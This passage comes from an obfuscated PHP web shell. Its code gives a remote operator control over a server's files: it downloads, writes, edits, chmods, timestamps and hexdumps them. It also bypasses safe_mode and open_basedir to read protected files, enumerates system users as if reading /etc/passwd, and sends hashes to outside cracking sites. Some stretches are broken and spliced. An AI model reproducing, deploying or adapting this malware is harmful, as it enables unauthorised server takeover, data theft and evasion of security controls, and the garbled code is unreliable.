o\\x6e\\x63l\\x69ck=\\x22d\\x6f\\x63ume\\x6e\\x74.h\\x66.a\\x63t\\x69o\\x6e\\x3d'\\x68tt\\x70://md\\x35\\x2e\\x72e\\x64\\x6e\\x6f\\x69\\x7a\\x65.co\\x6d/?q\\x3d'+d\\x6f\\x63\\x75me\\x6et.hf.\\x68a\\x73\\x68.\\x76a\\x6cue+\\x27&s\\x3dm\\x64\\x35\\x27\\x3b\\n\\x64o\\x63um\\x65\\x6et\\x2e\\x68f\\x2esu\\x62m\\x69t()\\x22\\x3e\\x3cbr>\\n\\t\\t\\t\\x3c\\x69\\x6e\\x70\\x75\\x74 \\x74\\x79\\x70\\x65=\\x22b\\x75t\\x74\\x6f\\x6e\\\"\\x20\\x76al\\x75\\x65\\x3d\\x22m\\x645\\x64ecry\\x70te\\x72.\\x63\\x6f\\x6d\\x22 \\x6f\\x6ec\\x6c\\x69\\x63\\x6b\\x3d\\\"doc\\x75\\x6den\\x74.h\\x66.act\\x69o\\x6e='h\\x74\\x74p://\\x77w\\x77\\x2emd5d\\x65c\\x72ypt\\x65r.\\x63\\x6f\\x6d/\\x27\\x3b\\nd\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74.hf.\\x73\\x75\\x62mi\\x74()\\\"\\x3e\\x3c\\x62r\\x3e\\n\\t\\t\\n\\t\\n\";printFooter();}function actionFilesTools(){${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"\\x6b\\x68\\x77\\x77c\\x77\\x75o\\x74\"]=\"\\x67\\x69d\";$sqyvxzfnir=\"\\x66\\x70\";if(isset($_POST[\"\\x701\"]))$_POST[\"p1\"]=urldecode($_POST[\"\\x701\"]);${\"\\x47LOB\\x41\\x4cS\"}[\"e\\x6e\\x72\\x73t\\x78\"]=\"\\x68\";${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x68w\\x62r\\x6b\\x74gp\"]=\"h\";if(@$_POST[\"\\x702\"]==\"\\x64ow\\x6elo\\x61\\x64\"){if(is_file($_POST[\"\\x701\"])&&is_readable($_POST[\"\\x70\\x31\"])){ob_start(\"ob_g\\x7ah\\x61\\x6edle\\x72\",4096);header(\"\\x43\\x6fntent-D\\x69\\x73p\\x6fsit\\x69\\x6f\\x6e: a\\x74\\x74ac\\x68\\x6de\\x6e\\x74;\\n\\x20f\\x69l\\x65\\x6ea\\x6de=\".basename($_POST[\"p1\"]));if(function_exists(\"\\x6d\\x69\\x6de_\\x63o\\x6e\\x74en\\x74_ty\\x70\\x65\")){$xcdhshzmpho=\"t\\x79\\x70e\";${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"\\x75v\\x64\\x78\\x63\\x72\"]}=@mime_content_type($_POST[\"p\\x31\"]);header(\"\\x43o\\x6e\\x74ent-Ty\\x70\\x65: \".${$xcdhshzmpho});}$angknrkdcbm=\"\\x66p\";${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6a\\x65\\x6fbf\\x70\\x67\\x6e\\x6b\\x71p\\x6b\"]}=@fopen($_POST[\"\\x70\\x31\"],\"\\x72\");if(${$angknrkdcbm}){${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x6b\\x69\\x6d\\x6e\\x68\\x72m\\x79\\x69\\x6d\\x6e\"]=\"fp\";while(!@feof(${${\"G\\x4cO\\x42AL\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70g\\x6e\\x6b\\x71\\x70\\x6b\"]}))echo@fread(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x6bi\\x6d\\x6e\\x68\\x72\\x6d\\x79\\x69\\x6d\\x6e\"]},1024);fclose(${${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"\\x6aeob\\x66\\x70\\x67n\\x6b\\x71p\\x6b\"]});}}elseif(is_dir($_POST[\"p\\x31\"])&&is_readable($_POST[\"\\x701\"])){}exit;}if(@$_POST[\"\\x702\"]==\"m\\x6b\\x66il\\x65\"){if(!file_exists($_POST[\"p1\"])){${\"G\\x4c\\x4f\\x42\\x41LS\"}[\"f\\x72t\\x79svqcj\\x65\\x62\\x69\"]=\"\\x66\\x70\";${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x79z\\x67ftr\"]=\"f\\x70\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x66\\x72\\x74\\x79\\x73\\x76\\x71\\x63j\\x65\\x62i\"]}=@fopen($_POST[\"\\x701\"],\"w\");if(${${\"\\x47L\\x4fBA\\x4cS\"}[\"y\\x7agft\\x72\"]}){$_POST[\"p\\x32\"]=\"edi\\x74\";fclose(${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"je\\x6fb\\x66\\x70gn\\x6bqp\\x6b\"]});}}}$yhphmmr=\"\\x76\";$wqerdybwvn=\"\\x76\";$murdukob=\"\\x6d\";printHeader();$gmqjhxp=\"\\x66\\x70\";echo\"\\x46il\\x65 t\\x6f\\x6f\\x6cs\";${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x78j\\x7a\\x73\\x6en\\x6f\"]=\"l\\x65\\x6e\";if(!file_exists(@$_POST[\"\\x701\"])){echo\"\\x46il\\x65 n\\x6f\\x74\\x20e\\x78\\x69\\x73\\x74s\";printFooter();return;}${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"w\\x6a\\x70\\x75\\x6f\\x63\\x67\\x6a\"]=\"\\x76\";${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x65\\x63\\x69\\x74\\x79rno\"]=\"\\x68\";$vuykctjpl=\"v\";$bjlnhixvm=\"\\x63\";${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x65\\x70\\x64\\x6a\\x73ic\\x72\\x6d\"]}=@posix_getpwuid(@fileowner($_POST[\"\\x701\"]));${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"l\\x6d\\x72\\x6c\\x76x\\x6a\\x61\\x78j\"]}=@posix_getgrgid(@fileowner($_POST[\"\\x70\\x31\"]));echo\"\\x3c\\x73\\x70an\\x3e\\x4e\\x61\\x6d\\x65:\\x3c/s\\x70\\x61\\x6e\\x3e \".htmlspecialchars($_POST[\"\\x701\"]).\"\\x20\\x3c\\x73\\x70\\x61n>\\x53\\x69ze:\\x3c/sp\\x61n>\\x20\".(is_file($_POST[\"\\x70\\x31\"])?viewSize(filesize($_POST[\"\\x70\\x31\"])):\"-\").\" \\x3csp\\x61n>\\x50\\x65r\\x6d\\x69ssi\\x6f\\x6e:O\\x77\\x6eer/G\\x72\\x6f\\x75\\x70:\\x3c/span\\x3e\\x20\".${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x65\\x70\\x64js\\x69cr\\x6d\"]}[\"n\\x61\\x6de\"].\"/\".${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x6b\\x68\\x77\\x77cw\\x75\\x6f\\x74\"]}[\"n\\x61me\"].\"\\x3c\\x62\\x72>\";$rladbqkw=\"i\";echo\" \".date(\"\\x59-\\x6d-\\x64\\x20H:\\x69:\\x73\",filectime($_POST[\"p1\"])).\"\\x20\\x41\\x63\\x63e\\x73s\\x20ti\\x6d\\x65:\\x4do\\x64\\x69f\\x79\\x20\\x74\\x69m\\x65: \".date(\"\\x59-m-d H:\\x69:\\x73\",filemtime($_POST[\"\\x70\\x31\"])).\"\\x3c\\x62\\x72\\x3e\\x3c\\x62\\x72\\x3e\";if(empty($_POST[\"p\\x32\"]))$_POST[\"\\x70\\x32\"]=\"\\x76i\\x65w\";if(is_file($_POST[\"p\\x31\"]))${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x73y\\x6d\\x68c\\x75\\x70\\x6f\\x62\\x75\"]}=array(\"\\x56ie\\x77\",\"Hi\\x67h\\x6cigh\\x74\",\"D\\x6f\\x77n\\x6coad\",\"H\\x65xd\\x75\\x6dp\",\"E\\x64\\x69t\",\"C\\x68mo\\x64\",\"\\x52e\\x6eam\\x65\",\"T\\x6fuch\");else${$murdukob}=array(\"Chm\\x6fd\",\"R\\x65\\x6e\\x61\\x6de\",\"T\\x6f\\x75c\\x68\");foreach(${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x73\\x79\\x6d\\x68\\x63\\x75p\\x6fb\\x75\"]} as${${\"G\\x4c\\x4fBA\\x4cS\"}[\"\\x77j\\x70\\x75o\\x63\\x67\\x6a\"]})echo\"\\x3ca\\x20hr\\x65f=# \\x6f\\x6e\\x63\\x6ci\\x63\\x6b\\x3d\\\"\\x67(nu\\x6cl,nu\\x6c\\x6c,n\\x75l\\x6c,\\x27\".strtolower(${$yhphmmr}).\"')\\\"\\x3e\".((strtolower(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x65ud\\x6f\\x75e\"]})==@$_POST[\"p2\"])?\"<\\x62>[\\x20\".${$vuykctjpl}.\" ]\":${$wqerdybwvn}).\"\\x3c/\\x61>\\x20\";echo\"\\x3c\\x62r\\x3e\\x3c\\x62\\x72\\x3e\";switch($_POST[\"\\x702\"]){case\"view\":echo\"\";${$sqyvxzfnir}=@fopen($_POST[\"p\\x31\"],\"\\x72\");if(${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6a\\x65\\x6f\\x62f\\x70\\x67n\\x6bq\\x70k\"]}){while(!@feof(${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70g\\x6e\\x6b\\x71pk\"]}))echo htmlspecialchars(@fread(${${\"\\x47LO\\x42ALS\"}[\"j\\x65\\x6f\\x62\\x66\\x70\\x67\\x6ekq\\x70\\x6b\"]},1024));@fclose(${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x6ae\\x6fb\\x66pg\\x6ekq\\x70\\x6b\"]});}echo\"\"),array(\"\"),${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"ba\\x78di\\x69\\x6f\\x76bk\"]}).\"\\x3c/\\x64\\x69\\x76>\";}break;case\"c\\x68mod\":if(!empty($_POST[\"p\\x33\"])){${\"\\x47\\x4cOBA\\x4cS\"}[\"\\x67\\x61\\x78i\\x71\\x69\"]=\"p\\x65r\\x6ds\";$whytseypu=\"i\";${\"\\x47L\\x4fBAL\\x53\"}[\"\\x6f\\x69k\\x7a\\x64b\\x6f\\x71\"]=\"i\";$dfkbfztemjv=\"\\x70\\x65\\x72m\\x73\";${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x70c\\x67ky\\x67r\\x6fs\\x72\\x65\"]=\"i\";${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x67\\x61x\\x69\\x71i\"]}=0;for(${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"p\\x63g\\x6b\\x79g\\x72\\x6f\\x73\\x72\\x65\"]}=strlen($_POST[\"\\x70\\x33\"])-1;${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x75\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63b\"]}>=0;--${$whytseypu})${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x75\\x6e\\x6eg\\x65\\x7a\\x69\\x73mj\"]}+=(int)$_POST[\"\\x703\"][${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"\\x75\\x62\\x6ag\\x6d\\x69\\x79\\x76\\x73c\\x62\"]}]*pow(8,(strlen($_POST[\"p\\x33\"])-${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"o\\x69\\x6b\\x7ad\\x62\\x6f\\x71\"]}-1));if(!@chmod($_POST[\"\\x701\"],${$dfkbfztemjv}))echo\"\\x43an't\\x20\\x73et\\x20pe\\x72\\x6dissio\\x6es!\\x3c\\x62r\\x3edoc\\x75\\x6de\\x6e\\x74.m\\x66\\x2e\\x703\\x2e\\x76\\x61\\x6cue\\x3d\\x22\\\";\\n\";else die(\"\\x3cs\\x63\\x72\\x69\\x70\\x74>g(n\\x75\\x6c\\x6c,\\x6e\\x75l\\x6c,nu\\x6c\\x6c,\\x6e\\x75ll,\\x22\\x22)<\\x69n\\x70\\x75t \\x74\\x79pe=\\x73u\\x62\\x6dit va\\x6c\\x75e=\\x22>\\x3e\\\"\\x3e\\x3cte\\x78t\\x61rea\\x20\\x6eame=te\\x78\\x74 class=\\x62\\x69g\\x61\\x72e\\x61\\x3e\";${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x6ae\\x6f\\x62fp\\x67\\x6ekq\\x70\\x6b\"]}=@fopen($_POST[\"\\x701\"],\"r\");if(${$gmqjhxp}){$crgttuutvp=\"\\x66\\x70\";$vsfiuyv=\"\\x66\\x70\";while(!@feof(${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"j\\x65\\x6f\\x62\\x66\\x70gn\\x6bqpk\"]}))echo htmlspecialchars(@fread(${$crgttuutvp},1024));@fclose(${$vsfiuyv});}echo\"\\x3c/t\\x65\\x78\\x74\\x61re\\x61\\x3e<\\x69n\\x70u\\x74\\x20\\x74y\\x70e=\\x73ubm\\x69t \\x76\\x61\\x6c\\x75e\\x3d\\x22>>\\x22\\x3e\\x3c/\\x66\\x6frm\\x3e\";break;case\"\\x68e\\x78du\\x6d\\x70\":${$bjlnhixvm}=@file_get_contents($_POST[\"\\x701\"]);${${\"\\x47LOB\\x41LS\"}[\"\\x6a\\x65y\\x65\\x6a\\x65\\x6a\\x76e\\x73\"]}=0;${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"e\\x6er\\x73t\\x78\"]}=array(\"\\x300\\x3000\\x30\\x300\\x3c\\x62r>\",\"\",\"\");${${\"\\x47\\x4cO\\x42ALS\"}[\"\\x78\\x6b\\x63\\x71\\x72\\x6c\\x64\\x6by\"]}=strlen(${${\"\\x47LO\\x42A\\x4c\\x53\"}[\"f\\x6d\\x75\\x6a\\x6f\\x6a\\x6d\\x6f\\x6c\"]});for(${$rladbqkw}=0;${${\"\\x47\\x4c\\x4fBALS\"}[\"ubj\\x67\\x6d\\x69\\x79\\x76scb\"]}<${${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"x\\x6az\\x73\\x6en\\x6f\"]};++${${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69\\x79\\x76\\x73c\\x62\"]}){$lpxtbylf=\"\\x63\";$uilusisex=\"h\";${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x6b\\x65w\\x6d\\x70\\x6f\\x73\\x74\\x6e\\x76\\x6d\"]=\"h\";${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x71\\x70\\x73\\x6a\\x75p\"]=\"\\x6e\";${\"\\x47L\\x4fBAL\\x53\"}[\"kv\\x65\\x62\\x69i\\x6ek\\x6d\"]=\"\\x63\";$kclxydc=\"c\";${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"k\\x6b\\x79z\\x70h\\x6b\"]=\"\\x69\";$pderycy=\"\\x69\";${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x75\\x70\\x74x\\x6c\\x68\\x6b\"]}[1].=sprintf(\"%\\x302\\x58\",ord(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6bv\\x65b\\x69\\x69\\x6ek\\x6d\"]}[${${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"ub\\x6agm\\x69\\x79\\x76\\x73\\x63\\x62\"]}])).\" \";switch(ord(${$lpxtbylf}[${${\"\\x47LOB\\x41LS\"}[\"\\x6b\\x6b\\x79\\x7a\\x70\\x68\\x6b\"]}])){case 0:${${\"\\x47L\\x4f\\x42ALS\"}[\"\\x75\\x70tx\\x6c\\x68k\"]}[2].=\"\\x20\";break;case 9:${${\"GLOB\\x41\\x4c\\x53\"}[\"\\x6be\\x77m\\x70\\x6f\\x73\\x74\\x6e\\x76\\x6d\"]}[2].=\" \";break;case 10:${$uilusisex}[2].=\"\\x20\";break;case 13:${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x75\\x70\\x74\\x78\\x6c\\x68\\x6b\"]}[2].=\"\\x20\";break;default:${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x75\\x70\\x74\\x78\\x6ch\\x6b\"]}[2].=${$kclxydc}[${$pderycy}];break;}${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6aey\\x65\\x6a\\x65\\x6a\\x76\\x65s\"]}++;if(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"\\x71\\x70s\\x6a\\x75\\x70\"]}==32){$xcoyhwoulc=\"\\x6e\";${$xcoyhwoulc}=0;$lulehit=\"\\x68\";if(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69\\x79\\x76\\x73\\x63\\x62\"]}+1<${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"x\\x6b\\x63\\x71\\x72\\x6c\\x64\\x6b\\x79\"]}){${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6d\\x71\\x6ev\\x77\\x6ds\\x77b\\x6a\\x67\"]=\"\\x68\";${${\"\\x47L\\x4f\\x42\\x41LS\"}[\"\\x6d\\x71n\\x76\\x77\\x6d\\x73\\x77\\x62\\x6a\\x67\"]}[0].=sprintf(\"%0\\x38\\x58\",${${\"\\x47\\x4cOB\\x41\\x4cS\"}[\"\\x75b\\x6a\\x67\\x6d\\x69\\x79\\x76\\x73\\x63b\"]}+1).\"<\\x62\\x72>\";}${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"u\\x70\\x74xl\\x68k\"]}[1].=\"
\";${$lulehit}[2].=\"\\n\";}}echo\"<\\x74\\x61ble c\\x65\\x6c\\x6csp\\x61ci\\x6eg\\x3d1\\x20c\\x65\\x6c\\x6c\\x70\\x61\\x64\\x64\\x69\\x6eg=5 \\x62gcolor\\x3d\\x2322\\x322\\x32\\x32\\x3e<\\x74\\x72><\\x74d bgcol\\x6f\\x72=#\\x33\\x33333\\x33\\x3e\\x3cs\\x70a\\x6e s\\x74\\x79l\\x65=\\x22fon\\x74-weig\\x68t: \\x6eo\\x72\\x6da\\x6c;\\n\\\">\\x3c\\x70\\x72\\x65\\x3e\".${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"hwb\\x72\\x6b\\x74\\x67p\"]}[0].\"\\x3c/t\\x64>\\x3ctd\\x20b\\x67\\x63o\\x6c\\x6f\\x72\\x3d\\x23\\x328\\x32\\x3828><\\x70\\x72\\x65\\x3e\".${${\"\\x47L\\x4fBAL\\x53\"}[\"ec\\x69\\x74\\x79r\\x6eo\"]}[1].\"\\x3c/\\x70\\x72e\\x3e\\x3c/\\x74d>\\x3c\\x74\\x64\\x20bgc\\x6flo\\x72\\x3d#3333\\x333><\\x70\\x72e>\".htmlspecialchars(${${\"\\x47\\x4c\\x4fBA\\x4cS\"}[\"\\x75\\x70txl\\x68k\"]}[2]).\"\\x3c/pr\\x65>\\x3c/td>\\x3c/\\x74r>\\x3c\\x69n\\x70ut ty\\x70e=te\\x78\\x74 \\x6ea\\x6de=n\\x61\\x6d\\x65\\x20\\x76alue\\x3d\\x22\".htmlspecialchars($_POST[\"p\\x31\"]).\"\\x22>\\x3ci\\x6e\\x70\\x75t\\x20\\x74\\x79\\x70\\x65=submi\\x74\\x20v\\x61\\x6cue=\\x22\\x3e\\x3e\\\"\\x3e\\x3c/\\x66\\x6f\\x72\\x6d\\x3e\";break;case\"\\x74\\x6fuch\":if(!empty($_POST[\"\\x70\\x33\"])){${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x68g\\x63\\x68\\x6d\\x67\\x75\"]=\"\\x74i\\x6de\";${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x68\\x67\\x63\\x68m\\x67\\x75\"]}=strtotime($_POST[\"p3\"]);if(${${\"G\\x4cO\\x42A\\x4cS\"}[\"\\x70\\x6e\\x70t\\x6e\\x70\\x6b\"]}){${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6e\\x65\\x71ps\\x73j\\x70\\x76\"]=\"\\x74\\x69\\x6d\\x65\";if(@touch($_POST[\"p1\"],${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6ee\\x71\\x70\\x73\\x73jp\\x76\"]},${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x70\\x6e\\x70\\x74n\\x70\\x6b\"]}))die(\"<\\x73cr\\x69\\x70\\x74\\x3e\\x67(\\x6eull,\\x6eu\\x6cl,\\x6e\\x75\\x6cl,\\x6eu\\x6cl,\\\"\\x22)\\x64ocu\\x6dent.\\x6d\\x66\\x2ep\\x33\\x2ev\\x61lu\\x65\\x3d\\\"\\\";\\n\\x22>\\x3c/form\\x3e\";break;case\"\\x6dk\\x66il\\x65\":break;}echo\"\\x3c/\\x64i\\x76\\x3e\";printFooter();}function actionSafeMode(){$pqwskyvvqk=\"t\\x65\\x6d\\x70\";${$pqwskyvvqk}=\"\";$zwneehmhg=\"\\x66\\x69\\x6c\\x65\\x73\";$bympscvsk=\"\\x74\\x65m\\x70\";ob_start();switch($_POST[\"p1\"]){case 1:${$bympscvsk}=@tempnam(${${\"G\\x4c\\x4fB\\x41L\\x53\"}[\"\\x71w\\x6c\\x66g\\x6a\"]},\"c\\x78\");if(@copy(\"com\\x70\\x72ess\\x2ezl\\x69b://\".$_POST[\"p\\x32\"],${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"\\x70\\x72\\x6b\\x6b\\x77\\x6ej\\x65\"]})){${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"y\\x6e\\x65\\x72\\x6bb\\x78\\x76xs\"]=\"tem\\x70\";echo@file_get_contents(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"yn\\x65\\x72k\\x62x\\x76x\\x73\"]});unlink(${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72k\\x6b\\x77n\\x6ae\"]});}else echo\"\\x53\\x6fr\\x72y.\\x2e.\\x20Ca\\x6e't\\x20op\\x65n file\";break;case 2:${$zwneehmhg}=glob($_POST[\"p2\"].\"*\");if(is_array(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"umw\\x67v\\x64\\x67e\"]})){$fvtjcrlfebs=\"\\x66ile\\x73\";$xogxmm=\"\\x66\\x69\\x6c\\x65na\\x6d\\x65\";foreach(${$fvtjcrlfebs} as${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"\\x67j\\x6du\\x66\\x64h\\x78\\x6f\"]})echo${$xogxmm}.\"\\n\";}break;case 3:${${\"G\\x4c\\x4fB\\x41LS\"}[\"sd\\x71c\\x70p\\x65q\\x6c\"]}=curl_init(\"\\x66\\x69l\\x65://\".$_POST[\"p2\"].\"\\x00\".SELF_PATH);curl_exec(${${\"\\x47\\x4cOBALS\"}[\"\\x73\\x64q\\x63\\x70pe\\x71\\x6c\"]});break;case 4:ini_restore(\"\\x73\\x61\\x66\\x65_\\x6dod\\x65\");ini_restore(\"\\x6fp\\x65\\x6e\\x5f\\x62\\x61s\\x65d\\x69r\");include($_POST[\"\\x70\\x32\"]);break;case 5:for(;$_POST[\"\\x70\\x32\"]<=$_POST[\"\\x70\\x33\"];$_POST[\"\\x702\"]++){${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"c\\x75\\x6ag\\x69\\x6f\\x64o\"]=\"\\x75\\x69\\x64\";$mylpwpdei=\"\\x75\\x69\\x64\";${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"c\\x75\\x6a\\x67\\x69odo\"]}=@posix_getpwuid($_POST[\"\\x702\"]);if(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x65p\\x64\\x6a\\x73i\\x63\\x72\\x6d\"]})echo join(\":\",${$mylpwpdei}).\"\\n\";}break;case 6:if(!function_exists(\"\\x69m\\x61p_o\\x70\\x65n\"))break;${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x75\\x6a\\x70\\x62\\x76\\x63\\x77l\"]}=imap_open($_POST[\"p2\"],\"\",\"\");if(${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"\\x75jp\\x62\\x76cw\\x6c\"]}==FALSE)break;echo imap_body(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75j\\x70\\x62\\x76\\x63\\x77\\x6c\"]},1);imap_close(${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x6ap\\x62\\x76\\x63\\x77l\"]});break;}${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72\\x6b\\x6bw\\x6e\\x6a\\x65\"]}=ob_get_clean();printHeader();echo\"<\\x64i\\x76 c\\x6ca\\x73\\x73\\x3dcon\\x74\\x65nt>\";${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x77\\x65\\x78\\x63k\\x6ab\\x70\\x71\"]=\"\\x74e\\x6d\\x70\";echo\"<\\x73\\x70\\x61n>C\\x6f\\x70y (r\\x65a\\x64\\x20file)\\x3c/\\x73\\x70an>\\x3c\\x66or\\x6d\\x20\\x6f\\x6e\\x73u\\x62mi\\x74\\x3d'g(n\\x75l\\x6c,\\x6eu\\x6c\\x6c,\\x221\\\",th\\x69\\x73.para\\x6d\\x2e\\x76\\x61\\x6c\\x75\\x65)\\x3b\\n\\x72\\x65tu\\x72\\x6e f\\x61ls\\x65\\x3b\\n\\x27\\x3e\\x3cin\\x70\\x75\\x74 ty\\x70\\x65\\x3d\\x74\\x65\\x78\\x74 \\x6eam\\x65=pa\\x72am><\\x69\\x6e\\x70ut\\x20\\x74ype\\x3d\\x73\\x75\\x62m\\x69\\x74\\x20\\x76al\\x75\\x65\\x3d\\\"\\x3e>\\x22\\x3eGlob (l\\x69\\x73\\x74 d\\x69r)\\x3cfo\\x72m\\x20o\\x6esub\\x6d\\x69\\x74\\x3d'\\x67(\\x6eu\\x6c\\x6c,\\x6eull,\\\"\\x32\\x22,this.p\\x61\\x72\\x61m\\x2ev\\x61l\\x75e)\\x3b\\nre\\x74\\x75rn \\x66\\x61l\\x73\\x65\\x3b\\n'>\\x3ci\\x6e\\x70\\x75\\x74\\x20\\x74\\x79p\\x65\\x3d\\x74e\\x78t\\x20\\x6ea\\x6de\\x3d\\x70aram>\\x3c\\x69np\\x75\\x74\\x20\\x74y\\x70\\x65\\x3ds\\x75\\x62mit\\x20v\\x61\\x6c\\x75\\x65\\x3d\\x22>>\\\"\\x3e\\x3c\\x62\\x72\\x3e\\x3cspa\\x6e>\\x43\\x75\\x72\\x6c\\x20(re\\x61\\x64\\x20f\\x69l\\x65)\\x3c\\x66or\\x6d \\x6f\\x6e\\x73ub\\x6d\\x69t\\x3d\\x27g(\\x6eu\\x6c\\x6c,nu\\x6cl,\\x22\\x33\\\",\\x74h\\x69s.\\x70a\\x72\\x61\\x6d\\x2e\\x76\\x61\\x6c\\x75\\x65);\\nret\\x75r\\x6e \\x66\\x61\\x6cse\\x3b\\n\\x27>\\x3c\\x69\\x6e\\x70ut\\x20\\x74y\\x70\\x65\\x3dte\\x78\\x74\\x20n\\x61\\x6d\\x65=\\x70\\x61r\\x61\\x6d\\x3e\\x3cin\\x70\\x75t\\x20\\x74\\x79\\x70\\x65=\\x73\\x75\\x62m\\x69\\x74 \\x76al\\x75\\x65\\x3d\\x22>\\x3e\\x22\\x3e<\\x62\\x72\\x3e\\x3c\\x73\\x70an\\x3eI\\x6ei\\x5f\\x72est\\x6fr\\x65 (r\\x65ad fil\\x65)\\x3c/s\\x70\\x61\\x6e>\\x3c\\x66or\\x6d\\x20onsub\\x6di\\x74=\\x27\\x67(\\x6eu\\x6cl,\\x6e\\x75l\\x6c,\\\"4\\x22,this.\\x70\\x61ra\\x6d\\x2ev\\x61\\x6c\\x75e);\\nret\\x75\\x72\\x6e\\x20fal\\x73\\x65;\\n\\x27>\\x3c\\x69n\\x70\\x75t\\x20ty\\x70\\x65=\\x74ext\\x20\\x6e\\x61\\x6de=p\\x61ra\\x6d><\\x69nput \\x74\\x79p\\x65=su\\x62mi\\x74\\x20\\x76alu\\x65\\x3d\\x22>>\\x22\\x3e\\x3c/f\\x6f\\x72m\\x3e\\x3c\\x62\\x72>\\x3c\\x73\\x70a\\x6e>Po\\x73\\x69x_\\x67et\\x70\\x77\\x75i\\x64\\x20(\\\"Rea\\x64\\x22 /\\x65t\\x63/\\x70as\\x73wd)\\x3c/s\\x70\\x61n\\x3e<\\x74\\x61\\x62\\x6c\\x65\\x3e\\x3ctd\\x3eFrom<\\x74\\x64>\\x3c\\x69n\\x70u\\x74 t\\x79p\\x65\\x3dt\\x65\\x78t\\x20\\x6e\\x61\\x6d\\x65\\x3dpara\\x6d1 \\x76alue=0>\\x3c/td>\\x3c\\x74d>\\x3cinpu\\x74\\x20\\x74yp\\x65\\x3dt\\x65\\x78\\x74 n\\x61\\x6de\\x3dp\\x61ram\\x32 va\\x6c\\x75e=10\\x30\\x30>\\x3c/\\x74r>\\x3c/\\x74\\x61bl\\x65\\x3e\\x3e\\\">\\x3c/\\x66\\x6f\\x72\\x6d>\\x3c\\x62r>\\x3c\\x62r\\x3e\\x3cs\\x70\\x61n>\\x49\\x6da\\x70_\\x6f\\x70\\x65n (\\x72e\\x61\\x64 